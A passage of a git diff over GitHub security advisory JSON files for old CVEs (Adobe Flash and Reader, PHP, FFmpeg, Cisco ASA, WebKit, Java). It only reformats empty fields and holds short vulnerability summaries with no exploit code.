"affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ghf6-w8vq-63r5/GHSA-ghf6-w8vq-63r5.json b/advisories/unreviewed/2022/05/GHSA-ghf6-w8vq-63r5/GHSA-ghf6-w8vq-63r5.json index 52f868c62b3..01eeef6d346 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghf6-w8vq-63r5/GHSA-ghf6-w8vq-63r5.json +++ b/advisories/unreviewed/2022/05/GHSA-ghf6-w8vq-63r5/GHSA-ghf6-w8vq-63r5.json @@ -7,12 +7,8 @@ "CVE-2011-0570" ], "details": "Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0588.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ghjq-3hx2-4q27/GHSA-ghjq-3hx2-4q27.json b/advisories/unreviewed/2022/05/GHSA-ghjq-3hx2-4q27/GHSA-ghjq-3hx2-4q27.json index 945a01e3587..cd117fc107f 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghjq-3hx2-4q27/GHSA-ghjq-3hx2-4q27.json +++ b/advisories/unreviewed/2022/05/GHSA-ghjq-3hx2-4q27/GHSA-ghjq-3hx2-4q27.json @@ -7,12 +7,8 @@ "CVE-2012-0769" ], "details": "Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.7 on Android 2.x and 3.x; and before 11.1.115.7 on Android 4.x does not properly handle integers, which allows attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ghqf-jx44-h9c5/GHSA-ghqf-jx44-h9c5.json b/advisories/unreviewed/2022/05/GHSA-ghqf-jx44-h9c5/GHSA-ghqf-jx44-h9c5.json index fb2809dc8e3..45e082dae17 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghqf-jx44-h9c5/GHSA-ghqf-jx44-h9c5.json +++ b/advisories/unreviewed/2022/05/GHSA-ghqf-jx44-h9c5/GHSA-ghqf-jx44-h9c5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gjm7-ffwr-v8q5/GHSA-gjm7-ffwr-v8q5.json b/advisories/unreviewed/2022/05/GHSA-gjm7-ffwr-v8q5/GHSA-gjm7-ffwr-v8q5.json index d26cc047faa..0070644b28e 100644 --- a/advisories/unreviewed/2022/05/GHSA-gjm7-ffwr-v8q5/GHSA-gjm7-ffwr-v8q5.json +++ b/advisories/unreviewed/2022/05/GHSA-gjm7-ffwr-v8q5/GHSA-gjm7-ffwr-v8q5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gmgj-6mhv-x5q4/GHSA-gmgj-6mhv-x5q4.json b/advisories/unreviewed/2022/05/GHSA-gmgj-6mhv-x5q4/GHSA-gmgj-6mhv-x5q4.json index 3a31b2c3df4..14eb4588019 100644 --- a/advisories/unreviewed/2022/05/GHSA-gmgj-6mhv-x5q4/GHSA-gmgj-6mhv-x5q4.json +++ b/advisories/unreviewed/2022/05/GHSA-gmgj-6mhv-x5q4/GHSA-gmgj-6mhv-x5q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gmv4-cxx4-rrcj/GHSA-gmv4-cxx4-rrcj.json b/advisories/unreviewed/2022/05/GHSA-gmv4-cxx4-rrcj/GHSA-gmv4-cxx4-rrcj.json index a6152f277df..9a7b149ecea 100644 --- a/advisories/unreviewed/2022/05/GHSA-gmv4-cxx4-rrcj/GHSA-gmv4-cxx4-rrcj.json +++ b/advisories/unreviewed/2022/05/GHSA-gmv4-cxx4-rrcj/GHSA-gmv4-cxx4-rrcj.json @@ -7,12 +7,8 @@ "CVE-2010-2184" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gmwg-2c9p-97x5/GHSA-gmwg-2c9p-97x5.json b/advisories/unreviewed/2022/05/GHSA-gmwg-2c9p-97x5/GHSA-gmwg-2c9p-97x5.json index b839b708174..0dadca0a13e 100644 --- a/advisories/unreviewed/2022/05/GHSA-gmwg-2c9p-97x5/GHSA-gmwg-2c9p-97x5.json +++ b/advisories/unreviewed/2022/05/GHSA-gmwg-2c9p-97x5/GHSA-gmwg-2c9p-97x5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gqgp-8xv7-mjfw/GHSA-gqgp-8xv7-mjfw.json b/advisories/unreviewed/2022/05/GHSA-gqgp-8xv7-mjfw/GHSA-gqgp-8xv7-mjfw.json index 0e963db4cc0..23f16d39e34 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqgp-8xv7-mjfw/GHSA-gqgp-8xv7-mjfw.json +++ b/advisories/unreviewed/2022/05/GHSA-gqgp-8xv7-mjfw/GHSA-gqgp-8xv7-mjfw.json @@ -7,12 +7,8 @@ "CVE-2011-0395" ], "details": "Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.0 before 8.0(5.20), 8.1 before 8.1(2.48), 8.2 before 8.2(3), and 8.3 before 8.3(2.1), when the RIP protocol and the Cisco Phone Proxy functionality are configured, allow remote attackers to cause a denial of service (device reload) via a RIP update, aka Bug ID CSCtg66583.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gvjh-w2gj-wqhg/GHSA-gvjh-w2gj-wqhg.json b/advisories/unreviewed/2022/05/GHSA-gvjh-w2gj-wqhg/GHSA-gvjh-w2gj-wqhg.json index df970c003e8..70237147518 100644 --- a/advisories/unreviewed/2022/05/GHSA-gvjh-w2gj-wqhg/GHSA-gvjh-w2gj-wqhg.json +++ b/advisories/unreviewed/2022/05/GHSA-gvjh-w2gj-wqhg/GHSA-gvjh-w2gj-wqhg.json @@ -7,12 +7,8 @@ "CVE-2011-1468" ], "details": "Multiple memory leaks in the OpenSSL extension in PHP before 5.3.6 might allow remote attackers to cause a denial of service (memory consumption) via (1) plaintext data to the openssl_encrypt function or (2) ciphertext data to the openssl_decrypt function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gw79-rp24-2pgc/GHSA-gw79-rp24-2pgc.json b/advisories/unreviewed/2022/05/GHSA-gw79-rp24-2pgc/GHSA-gw79-rp24-2pgc.json index 45a70386c8a..17ad568f52a 100644 --- a/advisories/unreviewed/2022/05/GHSA-gw79-rp24-2pgc/GHSA-gw79-rp24-2pgc.json +++ b/advisories/unreviewed/2022/05/GHSA-gw79-rp24-2pgc/GHSA-gw79-rp24-2pgc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gwg7-g9w7-wr87/GHSA-gwg7-g9w7-wr87.json b/advisories/unreviewed/2022/05/GHSA-gwg7-g9w7-wr87/GHSA-gwg7-g9w7-wr87.json index 392a8dcd1d9..67a03a3efb9 100644 --- a/advisories/unreviewed/2022/05/GHSA-gwg7-g9w7-wr87/GHSA-gwg7-g9w7-wr87.json +++ b/advisories/unreviewed/2022/05/GHSA-gwg7-g9w7-wr87/GHSA-gwg7-g9w7-wr87.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gwmg-8j97-jg68/GHSA-gwmg-8j97-jg68.json b/advisories/unreviewed/2022/05/GHSA-gwmg-8j97-jg68/GHSA-gwmg-8j97-jg68.json index 872b6a16602..60e6509470d 100644 --- a/advisories/unreviewed/2022/05/GHSA-gwmg-8j97-jg68/GHSA-gwmg-8j97-jg68.json +++ b/advisories/unreviewed/2022/05/GHSA-gwmg-8j97-jg68/GHSA-gwmg-8j97-jg68.json @@ -7,12 +7,8 @@ "CVE-2011-2140" ], "details": "Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h224-3vc9-hqhf/GHSA-h224-3vc9-hqhf.json b/advisories/unreviewed/2022/05/GHSA-h224-3vc9-hqhf/GHSA-h224-3vc9-hqhf.json index 339bf2ce7cc..f3d8290ea9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-h224-3vc9-hqhf/GHSA-h224-3vc9-hqhf.json +++ b/advisories/unreviewed/2022/05/GHSA-h224-3vc9-hqhf/GHSA-h224-3vc9-hqhf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h246-mqpx-mfvm/GHSA-h246-mqpx-mfvm.json b/advisories/unreviewed/2022/05/GHSA-h246-mqpx-mfvm/GHSA-h246-mqpx-mfvm.json index cbeb3cffde3..e6cb07fd100 100644 --- a/advisories/unreviewed/2022/05/GHSA-h246-mqpx-mfvm/GHSA-h246-mqpx-mfvm.json +++ b/advisories/unreviewed/2022/05/GHSA-h246-mqpx-mfvm/GHSA-h246-mqpx-mfvm.json @@ -7,12 +7,8 @@ "CVE-2010-2176" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h256-cg32-55jc/GHSA-h256-cg32-55jc.json b/advisories/unreviewed/2022/05/GHSA-h256-cg32-55jc/GHSA-h256-cg32-55jc.json index 16645e42508..10079c0cfc3 100644 --- a/advisories/unreviewed/2022/05/GHSA-h256-cg32-55jc/GHSA-h256-cg32-55jc.json +++ b/advisories/unreviewed/2022/05/GHSA-h256-cg32-55jc/GHSA-h256-cg32-55jc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h2ww-qm2g-98qf/GHSA-h2ww-qm2g-98qf.json b/advisories/unreviewed/2022/05/GHSA-h2ww-qm2g-98qf/GHSA-h2ww-qm2g-98qf.json index a7f116cb001..a969b0b9038 100644 --- a/advisories/unreviewed/2022/05/GHSA-h2ww-qm2g-98qf/GHSA-h2ww-qm2g-98qf.json +++ b/advisories/unreviewed/2022/05/GHSA-h2ww-qm2g-98qf/GHSA-h2ww-qm2g-98qf.json @@ -7,12 +7,8 @@ "CVE-2013-1000" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h3v6-hj58-cx74/GHSA-h3v6-hj58-cx74.json b/advisories/unreviewed/2022/05/GHSA-h3v6-hj58-cx74/GHSA-h3v6-hj58-cx74.json index e4950708e13..f5ebc0b38a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3v6-hj58-cx74/GHSA-h3v6-hj58-cx74.json +++ b/advisories/unreviewed/2022/05/GHSA-h3v6-hj58-cx74/GHSA-h3v6-hj58-cx74.json @@ -7,12 +7,8 @@ "CVE-2011-0421" ], "details": "The _zip_name_locate function in zip_name_locate.c in the Zip extension in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent attackers to cause a denial of service (NULL pointer dereference) via an empty ZIP archive that is processed with a (1) locateName or (2) statName operation.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -128,9 +124,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h4gq-q399-xm7r/GHSA-h4gq-q399-xm7r.json b/advisories/unreviewed/2022/05/GHSA-h4gq-q399-xm7r/GHSA-h4gq-q399-xm7r.json index 7b05d6fa539..d945b61915f 100644 --- a/advisories/unreviewed/2022/05/GHSA-h4gq-q399-xm7r/GHSA-h4gq-q399-xm7r.json +++ b/advisories/unreviewed/2022/05/GHSA-h4gq-q399-xm7r/GHSA-h4gq-q399-xm7r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h52w-hf3x-rwpw/GHSA-h52w-hf3x-rwpw.json b/advisories/unreviewed/2022/05/GHSA-h52w-hf3x-rwpw/GHSA-h52w-hf3x-rwpw.json index 22a1ed297f1..b9d426025cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-h52w-hf3x-rwpw/GHSA-h52w-hf3x-rwpw.json +++ b/advisories/unreviewed/2022/05/GHSA-h52w-hf3x-rwpw/GHSA-h52w-hf3x-rwpw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h5ff-8r22-qwvc/GHSA-h5ff-8r22-qwvc.json b/advisories/unreviewed/2022/05/GHSA-h5ff-8r22-qwvc/GHSA-h5ff-8r22-qwvc.json index 29f192ddcce..57ab5cef344 100644 --- a/advisories/unreviewed/2022/05/GHSA-h5ff-8r22-qwvc/GHSA-h5ff-8r22-qwvc.json +++ b/advisories/unreviewed/2022/05/GHSA-h5ff-8r22-qwvc/GHSA-h5ff-8r22-qwvc.json @@ -7,12 +7,8 @@ "CVE-2012-0856" ], "details": "Heap-based buffer overflow in the MPV_frame_start function in libavcodec/mpegvideo.c in FFmpeg before 0.9.1, when the lowres option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted H263 media file. NOTE: this vulnerability exists because of a regression error.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h5jp-cgxq-7mwj/GHSA-h5jp-cgxq-7mwj.json b/advisories/unreviewed/2022/05/GHSA-h5jp-cgxq-7mwj/GHSA-h5jp-cgxq-7mwj.json index 11875ade1a4..304d38bcd4a 100644 --- a/advisories/unreviewed/2022/05/GHSA-h5jp-cgxq-7mwj/GHSA-h5jp-cgxq-7mwj.json +++ b/advisories/unreviewed/2022/05/GHSA-h5jp-cgxq-7mwj/GHSA-h5jp-cgxq-7mwj.json @@ -7,12 +7,8 @@ "CVE-2011-0867" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -148,9 +144,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h6fq-qr75-3xfq/GHSA-h6fq-qr75-3xfq.json b/advisories/unreviewed/2022/05/GHSA-h6fq-qr75-3xfq/GHSA-h6fq-qr75-3xfq.json index 54883204475..a7cb8a44ec5 100644 --- a/advisories/unreviewed/2022/05/GHSA-h6fq-qr75-3xfq/GHSA-h6fq-qr75-3xfq.json +++ b/advisories/unreviewed/2022/05/GHSA-h6fq-qr75-3xfq/GHSA-h6fq-qr75-3xfq.json @@ -7,12 +7,8 @@ "CVE-2013-0997" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h7xf-9xwx-5jwr/GHSA-h7xf-9xwx-5jwr.json b/advisories/unreviewed/2022/05/GHSA-h7xf-9xwx-5jwr/GHSA-h7xf-9xwx-5jwr.json index 5762219daaa..485bca7009b 100644 --- a/advisories/unreviewed/2022/05/GHSA-h7xf-9xwx-5jwr/GHSA-h7xf-9xwx-5jwr.json +++ b/advisories/unreviewed/2022/05/GHSA-h7xf-9xwx-5jwr/GHSA-h7xf-9xwx-5jwr.json @@ -7,12 +7,8 @@ "CVE-2010-3621" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h8f8-mfm9-grf3/GHSA-h8f8-mfm9-grf3.json b/advisories/unreviewed/2022/05/GHSA-h8f8-mfm9-grf3/GHSA-h8f8-mfm9-grf3.json index ce48ae616da..d962e6bac54 100644 --- a/advisories/unreviewed/2022/05/GHSA-h8f8-mfm9-grf3/GHSA-h8f8-mfm9-grf3.json +++ b/advisories/unreviewed/2022/05/GHSA-h8f8-mfm9-grf3/GHSA-h8f8-mfm9-grf3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h92r-hw98-gw25/GHSA-h92r-hw98-gw25.json b/advisories/unreviewed/2022/05/GHSA-h92r-hw98-gw25/GHSA-h92r-hw98-gw25.json index bd2af8fd015..d63cb935288 100644 --- a/advisories/unreviewed/2022/05/GHSA-h92r-hw98-gw25/GHSA-h92r-hw98-gw25.json +++ b/advisories/unreviewed/2022/05/GHSA-h92r-hw98-gw25/GHSA-h92r-hw98-gw25.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h935-95pr-wqf9/GHSA-h935-95pr-wqf9.json b/advisories/unreviewed/2022/05/GHSA-h935-95pr-wqf9/GHSA-h935-95pr-wqf9.json index 845a699934c..efbe6864cc0 100644 --- a/advisories/unreviewed/2022/05/GHSA-h935-95pr-wqf9/GHSA-h935-95pr-wqf9.json +++ b/advisories/unreviewed/2022/05/GHSA-h935-95pr-wqf9/GHSA-h935-95pr-wqf9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h9c2-3p3h-qc69/GHSA-h9c2-3p3h-qc69.json b/advisories/unreviewed/2022/05/GHSA-h9c2-3p3h-qc69/GHSA-h9c2-3p3h-qc69.json index 5f0b40901a4..8d5e11c7869 100644 --- a/advisories/unreviewed/2022/05/GHSA-h9c2-3p3h-qc69/GHSA-h9c2-3p3h-qc69.json +++ b/advisories/unreviewed/2022/05/GHSA-h9c2-3p3h-qc69/GHSA-h9c2-3p3h-qc69.json @@ -7,12 +7,8 @@ "CVE-2010-3627" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h9mv-mh94-hhp7/GHSA-h9mv-mh94-hhp7.json b/advisories/unreviewed/2022/05/GHSA-h9mv-mh94-hhp7/GHSA-h9mv-mh94-hhp7.json index 1fe857104dc..9aff4269d62 100644 --- a/advisories/unreviewed/2022/05/GHSA-h9mv-mh94-hhp7/GHSA-h9mv-mh94-hhp7.json +++ b/advisories/unreviewed/2022/05/GHSA-h9mv-mh94-hhp7/GHSA-h9mv-mh94-hhp7.json @@ -7,12 +7,8 @@ "CVE-2011-4680" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the customer portal in vtiger CRM before 5.2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hc77-cjpx-fxrf/GHSA-hc77-cjpx-fxrf.json b/advisories/unreviewed/2022/05/GHSA-hc77-cjpx-fxrf/GHSA-hc77-cjpx-fxrf.json index 17d25aca670..1a2bd0fb001 100644 --- a/advisories/unreviewed/2022/05/GHSA-hc77-cjpx-fxrf/GHSA-hc77-cjpx-fxrf.json +++ b/advisories/unreviewed/2022/05/GHSA-hc77-cjpx-fxrf/GHSA-hc77-cjpx-fxrf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hcr6-qm77-jcpq/GHSA-hcr6-qm77-jcpq.json b/advisories/unreviewed/2022/05/GHSA-hcr6-qm77-jcpq/GHSA-hcr6-qm77-jcpq.json index 18673966299..bdaee2ac3c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-hcr6-qm77-jcpq/GHSA-hcr6-qm77-jcpq.json +++ b/advisories/unreviewed/2022/05/GHSA-hcr6-qm77-jcpq/GHSA-hcr6-qm77-jcpq.json @@ -7,12 +7,8 @@ "CVE-2012-2790" ], "details": "Unspecified vulnerability in the read_var_block_data function in libavcodec/alsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to the \"number of decoded samples in first sub-block in BGMC mode.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hf48-5qr3-wj8w/GHSA-hf48-5qr3-wj8w.json b/advisories/unreviewed/2022/05/GHSA-hf48-5qr3-wj8w/GHSA-hf48-5qr3-wj8w.json index 29493bef5af..fb956afb5da 100644 --- a/advisories/unreviewed/2022/05/GHSA-hf48-5qr3-wj8w/GHSA-hf48-5qr3-wj8w.json +++ b/advisories/unreviewed/2022/05/GHSA-hf48-5qr3-wj8w/GHSA-hf48-5qr3-wj8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hgcv-r3v9-7mc9/GHSA-hgcv-r3v9-7mc9.json b/advisories/unreviewed/2022/05/GHSA-hgcv-r3v9-7mc9/GHSA-hgcv-r3v9-7mc9.json index e93d6eb0ee8..9896414f351 100644 --- a/advisories/unreviewed/2022/05/GHSA-hgcv-r3v9-7mc9/GHSA-hgcv-r3v9-7mc9.json +++ b/advisories/unreviewed/2022/05/GHSA-hgcv-r3v9-7mc9/GHSA-hgcv-r3v9-7mc9.json @@ -7,12 +7,8 @@ "CVE-2010-2187" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hhgg-9qff-8q38/GHSA-hhgg-9qff-8q38.json b/advisories/unreviewed/2022/05/GHSA-hhgg-9qff-8q38/GHSA-hhgg-9qff-8q38.json index 91fa60ab1a8..a94d69dedc8 100644 --- a/advisories/unreviewed/2022/05/GHSA-hhgg-9qff-8q38/GHSA-hhgg-9qff-8q38.json +++ b/advisories/unreviewed/2022/05/GHSA-hhgg-9qff-8q38/GHSA-hhgg-9qff-8q38.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hjgc-3qw9-7c94/GHSA-hjgc-3qw9-7c94.json b/advisories/unreviewed/2022/05/GHSA-hjgc-3qw9-7c94/GHSA-hjgc-3qw9-7c94.json index 8ce5f95fcdd..ff9aec01e09 100644 --- a/advisories/unreviewed/2022/05/GHSA-hjgc-3qw9-7c94/GHSA-hjgc-3qw9-7c94.json +++ b/advisories/unreviewed/2022/05/GHSA-hjgc-3qw9-7c94/GHSA-hjgc-3qw9-7c94.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hm85-49m2-5vc3/GHSA-hm85-49m2-5vc3.json 